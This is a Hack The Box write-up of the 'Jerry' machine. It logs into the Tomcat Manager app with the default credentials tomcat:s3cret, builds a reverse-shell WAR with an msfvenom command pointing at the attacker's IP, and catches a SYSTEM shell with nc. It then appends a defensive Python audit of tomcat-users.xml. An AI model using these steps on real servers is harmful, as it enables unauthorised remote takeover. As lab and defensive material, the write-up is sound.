HTB: Jerry
Jerry
Next cab off the rank when sorted by Pwnage is Jerry (after Lame). Again, I went into this one blind.
Ports
We’ve got one port only, 8080. This appears to be Windows, based on the TTL.
8080
We’ve got Apache Tomcat 7.0.88, and as we will soon see it’s running on Windows Server 2012 R2.
7.0.88 is supposed to be vulnerable to a few things; in particular CVE-2019-0232. I try the Metasploit module but it doesn’t seem to want to work.
Default creds
We can log into the Manager app with default creds; namely tomcat:s3cret. There is an authenticated MSF module but I don’t just want to sit here yeeting Metasploit at everything. Let’s go manual:
┌──(root💀kali)-[/opt/htb/jerry]
└─# msfvenom -p java/shell_reverse_tcp lhost=10.10.14.2 lport=1234 -f war -o pwn.war
Payload size: 13397 bytes
Final size of war file: 13397 bytes
Saved as: pwn.war
We can upload and deploy our WAR file using the Manager App in the browser. With a listener running, the shell comes back:
┌──(root💀kali)-[/opt/htb/jerry]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
#etc
C:\Users\Administrator\Desktop\flags>dir
dir
Volume in drive C has no label.
Volume Serial Number is FC2B-E489
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 06:09 AM <DIR> .
06/19/2018 06:09 AM <DIR> ..
06/19/2018 06:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 27,599,585,280 bytes free
Another fairly easy one. They aren’t this easy anymore!
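From the defender's side, the whole chain above rests on a Manager account left on default credentials in tomcat-users.xml. The Python check below is an added example, not part of the original write-up or of Tomcat itself: it flags accounts that hold deploy-capable roles with weak passwords. The sample config and every credential pair other than tomcat:s3cret are assumptions constructed for the demo.

```python
import xml.etree.ElementTree as ET

# Tomcat roles that let an account deploy web applications (code runs as the service account).
DEPLOY_ROLES = {"manager-gui", "manager-script", "admin-gui", "admin-script"}
# tomcat:s3cret is the pair from this write-up; the other pairs are assumed common defaults.
WEAK_CREDS = {("tomcat", "s3cret"), ("tomcat", "tomcat"), ("admin", "admin"), ("admin", "")}

# Constructed sample tomcat-users.xml for the demo, not taken from the target.
SAMPLE = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="monitor" password="monitor" roles="manager-status"/>
  <user username="deployer" password="deployer" roles="manager-script"/>
  <user username="release" password="Xk9#constructed-long-value" roles="manager-script"/>
</tomcat-users>"""


def audit_tomcat_users(xml_text):
    """Return (username, severity, reason) findings, worst first."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        # Newer config files carry an XML namespace, so compare local tag names only.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        user = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        can_deploy = sorted(roles & DEPLOY_ROLES)
        weak = (user, password) in WEAK_CREDS or password == user
        if can_deploy and weak:
            findings.append((user, "high", "weak password with " + ",".join(can_deploy)))
        elif can_deploy:
            findings.append((user, "review", "can deploy WARs via " + ",".join(can_deploy)))
        elif weak:
            findings.append((user, "low", "weak password, no deploy role"))
    order = {"high": 0, "review": 1, "low": 2}
    return sorted(findings, key=lambda f: order[f[1]])


if __name__ == "__main__":
    for user, severity, reason in audit_tomcat_users(SAMPLE):
        print(f"{severity:6} {user:10} {reason}")
```

A "high" finding here is exactly the condition that made this box fall; the whoami output above also shows the service running as SYSTEM, which this file-level check cannot see and needs a separate look at the service account.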